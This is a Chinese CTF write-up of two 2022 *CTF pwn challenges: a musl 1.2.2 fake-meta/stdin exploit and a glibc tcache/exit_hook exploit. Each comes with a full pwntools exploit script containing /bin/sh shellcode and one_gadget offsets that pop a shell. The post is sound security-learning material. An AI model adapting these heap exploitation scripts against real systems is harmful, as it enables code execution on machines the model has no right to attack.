---
title: 2022 starCTF pwn 复现
date: 2022-04-21 13:06:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=14/
pin: false
published:
---

这次比赛的题学到很多，感谢比赛方。这次比赛做题策略和思路都有问题，自己好好反思了一下

一道正常的堆题，但逆向难度要大些，功能比较多；一道musl，也是老题改的，按理说模仿一下应该也能做出来。还有2道暂时还没学到，过段时间再复现

题目和IDA逆向文件链接：<https://pan.baidu.com/s/1IyI0wMMB-bkk_h0T4Hcudg?pwd=hhhh> 提取码：hhhh 

## babynote(musl1.2.2/UAF伪造meta打stdin)

这次比赛出了一道musl1.2.2的题，以前没遇到过，所以现学了。由于1.1.2相比于1.2.2改动较大，这里主要介绍一下1.2.2下的基本情况。

这里推荐2篇不错的学习musl基本堆管理的文章，**特别是关于堆的申请和释放规则和流程是刚需**

[借助DefCon Quals 2021的mooosl学习musl mallocng（源码审计篇） - 安全客，安全资讯平台 (anquanke.com)](https://www.anquanke.com/post/id/241101#h3-2)

[musl 1.2.2 总结](https://bbs.pediy.com/thread-269533-1.htm#msg_header_h2_1)

musl是静态堆管理机制，基本上就如图所示，这里偷个懒就不再讲一遍了，看上边2篇文章结合题目应该比较熟悉了

![image-20210920011323565](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/907645_7VA2DPUVB45HNCD.jpg)

下边主要讲下利用，首先是程序怎么跑

```bash
$ sudo cp libc.so /lib/ld-musl-x86_64.so.1
```

然后就能直接运行了，由于musl的结构有区别用不了heapinfo/bin等命令，所以这里推荐[xf1les](https://github.com/xf1les)师傅写的gdb脚本[xf1les/muslheap: a GDB plug-in for inspecting mallocng (github.com)](https://github.com/xf1les/muslheap)

保护全开，题目确实是defconctf mooosl改的

![image-20220420082717903](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220420082717903.png)

题目全程用calloc申请堆块，用一个crl结构体来管理2个附属堆块name和content

![image-20220420083349660](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220420083349660.png)

漏洞点主要在于UAF，可以用来泄露地址和伪造meta

![image-20220420082926046](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220420082926046.png)

以及题目的‘read’函数里边有offbyone

![image-20220420083154280](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220420083154280.png)

注意在题目中寻找堆块是通过堆块比对来实现，比对的字节长实际是创建新堆输入内容的字节长

然后需要注意的是，使用 calloc 分配 fake chunk 会导致程序崩溃。

因为 calloc 会调用一个名为`__malloc_allzerop`的函数，检查分配到的堆块是否为全零。

```c
// src/calloc.c:33
void *calloc(size_t m, size_t n)
{
    [...]
    void *p = malloc(n);
    if (!p || (!__malloc_replaced && __malloc_allzerop(p)))      <---------
        return p;
    n = mal0_clear(p, n);
    return memset(p, 0, n);
}
```

`__malloc_allzerop`调用`get_meta`函数获取 chunk 的 meta。由于 fake chunk 不能通过`get_meta`函数中的合法性检查，程序会直接 crash 掉。

```c
// src/mallocng/malloc.c:382
int is_allzero(void *p)
{
    struct meta *g = get_meta(p);    <----------
    return g->sizeclass >= 48 ||
        get_stride(g) < UNIT*size_classes[g->sizeclass];
}
```

唯一能够避免 crash 的方法就是将`__malloc_replaced`全局变量设为非零。

```c
// 当 __malloc_replaced 为真时，不执行 __malloc_allzerop(p)
    if (!p || (!__malloc_replaced && __malloc_allzerop(p)))
        return p;
```

我们可以先将`fake_meta->mem`设为`__malloc_replaced+4`，然后调用 calloc 分配一个 fake chunk。calloc 调用的 malloc 会将 fake chunk header 写到`__malloc_replaced`上面，使其变为一个非零值，从而阻止 calloc 调用`__malloc_allzerop`。

关于exp

leak部分主要是0x30里内容的变化，其它堆块的变化不重要

![leak](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220420085500155.png)

![fake meta](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220420092458115.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level = 'debug'

p = process('./babynote')
# p = remote("123.60.76.240","60001")
def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def choice(idx):
    sla("option: ",str(idx))

def add(sz,con,sz1,note):
    choice(1)
    sla("name size: ",sz)
    sla("name: ",con)
    sla("note size: ",sz1)
    sla("note content: ",note)  
# def add1(sz,con,sz1,note):
#     choice(1)
#     sleep(0.1)
#     sl(sz)
#     sleep(0.1)
#     sl(con)
#     sleep(0.1)
#     sl(sz1)
#     sleep(0.1)
#     sl(note)    
#     sleep(0.1)
def delete(sz,con):
    choice(3)
    sla("name size: ",sz)
    sla("name: ",con)

def show(sz,con):
    choice(2)
    sla("name size: ",sz)
    sla("name: ",con)

def forge():
    choice(4)

# leak libc_base/堆块基地址
# 填满 0x30(tips:mem指向堆块头部)
add(0x28,'0'*1,0x28,'0'*0x27)
add(0x28,'1'*1,0x28,'1'*0x27)
add(0x28,'2'*1,0x28,'2'*0x27)
add(0x1540,'x',0x1540,'h'*0x27)# 0x1540*2 这个大小可任选
# 调整位置，为了让某个crl1堆块在crl2.content上，让我们泄露(主要操作0x30)
delete(0x60,'0')
add(0x80,'0'*1,0x28,'0'*8)
delete(0x60,'0')
delete(0x60,'x')# 3号位置现在是可申请的
add(0x1540,'3',0x1f,'3'*0x1e)# 申请0x1f也是给0x30的堆块
add(0x1540,'4',0x80,'4'*0x1e)# 4 crl in 2place at now
delete(0x60,4)
add(0x80,'5'*1,0x28,'5'*0x27)# 5 crl in lastplace
delete(0x60,'5')
add(0x1540,'6'+'\x00'*0xf+'99',0x1540,'6'*8)# mmap开辟堆块其地址能让我们获得libc偏移
show(0x60,'5')
ru('0x27:')
i1 = int(r(2),16)
i2 = int(r(2),16)
i3 = int(r(2),16)
i4 = int(r(2),16)
i5 = int(r(2),16)
i6 = int(r(2),16)
data = i6 * 0x10000000000 + i5*0x100000000 + i4 * 0x1000000
data +=i3 * 0x10000 + i2*0x100+i1
lg('data',data)
libc_base = data - 0x7eff9ec45060 + 0x7eff9ec49000
mal_cont = libc_base + 0xB4AC0# secret_addr
lg('libc_base',libc_base)
lg('mal_cont',mal_cont)
r(60-6)
i2 = int(r(2),16)
i3 = int(r(2),16)
i4 = int(r(2),16)
i5 = int(r(2),16)
i6 = int(r(2),16)
base20 = i6 * 0x10000000000 + i5*0x100000000 + i4 * 0x1000000
base20 +=i3 * 0x10000 + i2*0x100+0xc0
lg('base20',base20)# 3place（指向内容）
#---------------------------------------
# leak secret 
delete(0x60,'3')
delete(0x60,'2')
pay = 0x20*'x'+p64(base20+0xc0)[:6]# 设置引索
add(0x60,'pad1',0x28,pay)
fake_control = p64(base20+0xc0)+p64(mal_cont)+p64(1)+p64(8)+p64(base20-0x60)[:6]#0x30 header这里引索也无所谓
add(0x60,'3',0x28,fake_control)# fake 2crl->3.con
show(0x60,'\x80')
ru('0x8:')
i1 = int(r(2),16)     
i2 = int(r(2),16)
i3 = int(r(2),16)
i4 = int(r(2),16)
i5 = int(r(2),16)
i6 = int(r(2),16)    
i7 = int(r(2),16)    
i8 = int(r(2),16)    
secret = i6 * 0x10000000000 + i5*0x100000000 + i4 * 0x1000000
secret+= i3 * 0x10000 + i2*0x100+i1  
secret+= i7 * 0x1000000000000 + i8*0x100000000000000
lg('secret',secret)
stdout = libc_base+0xb4280
lg('stdout',stdout)
#----------------------------------------------
# 伪造fakemeta入链
delete(0x60,'pad1')
delete(0x60,'3')
delete(0x60,'1')

sizeclass = 10
# fake crl and 设置引索 for del
pay = p64(base20-0x60)*2+p64(1)+p64(8)+p64(base20+0x60)[:6] # -0x60 libc_base
add(0x1f,'10',0x28,pay)

off = 0x3050# data+off=0x7FBAF17770B0 定位lastpage

fake_meta = ''
fake_meta = fake_meta.ljust(0x1000-0x90,'a')# 填充至最后一页
fake_meta += p64(data+off-0x70)[:8]+p64(0)# 040=fakemeta_addr
fake_meta += p64(secret)+p64(0)*7+p64(0)+p64(0)# 
fake_meta += p64(data+off-0x70+0x240)+p64(0)+p64((sizeclass << 6) + 1)#  0xxx280 0 281 fakemeta
fake_meta = fake_meta.ljust(0x1200,'\x00')
fake_meta += (p64(data+off-0x70)+p64(0))*2# # 040=fakemeta_addr fakechunk

add(0x60,'12',0x1540,fake_meta)# lase page
fake_meta_ptr = p64(data+off-0x80+0x20+0x240)+p64(0)+p64(1)# # 0xx290=fakechunk lastpage 
add(0x60,'11',0x1e,fake_meta_ptr)
add(0x60,'13',0x1540,fake_meta) # anon+0x90 # 2page 这里无所谓
delete(0x60,p8((0x40)&0xff))# del 11.con 触发伪造meta
#------------------------------------------------
# 利用伪造的active[10]达到任意地址写，改malloc_replaced/stdin
delete(0x60,'12')# lastpage del

malloc_replaced = libc_base + 0xB6F84
fake_meta = ''
fake_meta = fake_meta.ljust(0x1000-0x10-0x80-0x20,'a')
fake_meta+= p64(data+off+0x10-0x80)[:8]+p64(0)
fake_meta+= p64(secret)+p64(0)*7+p64(0)+p64(0)
fake_meta+= p64(malloc_replaced-0x10+4)+p64(1)+p64((1 << 6) + 1)# set mem to add

add(0x60,'12',0x1540,fake_meta)# add lastpage
add(0x60,'14',0xa0,'\x00')# 申请malloc_replaced/写入堆块头
#-----------------------------------------------
delete(0x60,'12')# lastpage del
stdin = libc_base +0xB4180
sys = libc_base + 0x50A90
lg('stdin',stdin)
lg('sys',sys)

fake_meta = ''
fake_meta = fake_meta.ljust(0x1000-0x10-0x80-0x20-0x10,'a')
fake_meta+= p64(data+off+0x10-0x80)[:8]+p64(0)
fake_meta+= p64(secret)+p64(0)*7+p64(0)+p64(0)
fake_meta+= p64(stdin - 0xd0)+p64(1)+p64((9 << 6) | 1)+'a'*0x18+p64(stdout-0x10)
add(0x60,'12',0x1540,fake_meta)# add lastpage
fakesttdout = 0x20*'\x00'+"/bin/sh\x00"+"A"*0x20+p64(1)+'a'*8+p64(0)+'a'*8+p64(sys)# gdb调试定位输入点
add(0x60,'fakesttdout',0xa0,fakesttdout)
sleep(0.1)
sl('5')
p.interactive()
```

## examination(UAF+calloc/exit_hook利用)

这题就像作者说的一样，功能比较多更接近真实程序，还是要跟着漏洞走。既然有UAF就试试打tcache_struct

主要利用思路：题目有个功能当分数大于60分时，会打印一个堆地址得到heap_base；在教师端打分，当存在'惩罚'时，会扣分，这里的成绩sc是个无符号数，所以可以直接得到一个很大的分值。又有一个奖励功能，一个'学生'有一次机会，对一个地址里的值+1，利用这一点可以修改tcache，但题目用calloc申请，所以这里主要是填tcachebin，结合del功能（这里能del四次），实现放入一个堆块进入unsortbin，得到libc_base。

题目有一个malloc功能，malloc然后写入。但使用以后就会执行exit，所以这里就考虑申请exit_hook写exit_hook，malloc可以申请tcache，那我们直接在tcache_struct里对应大小的首节点即可。实际操作，要控制tcache结构体利用setmode功能，这个功能有2个分功能：一个是开辟一个附属堆块，并写入内容；一个在'学生'堆块上放附属堆块地址的位置写一个小于100的数。利用第二个分功能实现小区域任意申请，可以申请到tcache_struct。

![image-20220421130625857](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220421130625857.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level = 'debug'

p = process('./examination')
elf = ELF("./examination")
libc = elf.libc
# p = remote("123.60.76.240","60001")
def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def addstu(num):
    sla("choice>> ",1)
    sla("enter the number of questions: ",num)
def givesc():
    sla("choice>> ",2)
def addcom(idx,size,con):
    sla("choice>> ",3)
    sla("which one? > ",idx)
    sla("please input the size of comment: ",size)
    sa("enter your comment:",con)
def delstu(idx):
    sla("choice>> ",4)
    sla("which student id to choose?",idx)
def role(choice):
    sla("choice>> ",5)
    sla("role: <0.teacher/1.student>: ",choice)

def check():
    sla("choice>> ",2)
def pray():
    sla("choice>> ",3)
def setmode0(con):
    sla("choice>> ",4)
    sa("enter your mode!",con)
def setmode1(sc):
    sla("choice>> ",4)
    sla("enter your pray score: 0 to 100",sc)
def setid(idx):
    sla("choice>> ",6)
    sla("input your id: ",idx)
    
# leak heap_base
sla("role: <0.teacher/1.student>: ",0)
addstu(1)#0
role(1)
setmode0('ccc')
pray()
role(0)
addstu(1)#1
addstu(1)#2
addstu(1)#3
addstu(1)#4
addstu(1)#5
addstu(1)#6
role(1)
for i in range(1,6):
    setid(i)
    pray()
role(0)
givesc()
for i in range(0,4):
    addcom(i,0x3ff,'ccc')
addcom(4,0x300,'ccc')# 增加一个0x310的tcachebinchunk 后边申请要用
role(1)
check()
p.recvuntil("Good Job! Here is your reward! ")
heap_base=int(p.recvuntil("\n"),16)-0x2a0
lg('heap_base',heap_base)
place = heap_base+0x8e
sa("addr: ",place)#+1

setid(1)
check()
sa("addr: ",place)#+2
setid(2)
check()
sa("addr: ",place)#+3
setid(3)
check()
sa("addr: ",place)#+4
setid(4)
check()
sa("addr: ",place)#+5

role(0)
delstu(1)
delstu(2)
delstu(3)

role(1)
setid(5)
check()
sa("addr: ",heap_base+0x1128)#+3# unsortbin

role(0)
addcom(6,0x3ff,'\x00')
delstu(4)
role(1)
setid(6)
check()
libc_base = uu64()-0x1ECB00
lg('libc_base',libc_base)
setid(0)
setmode1(0x8)# tcache
pray()
exit_hook = libc_base +0x222f68
setmode0(p64(exit_hook))
role(0)
sla("choice>> ",6)
sla("never pray again!",p64(libc_base+0xe3b2e))

'''
0xe3b2e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b31 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b34 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''
p.interactive()
```



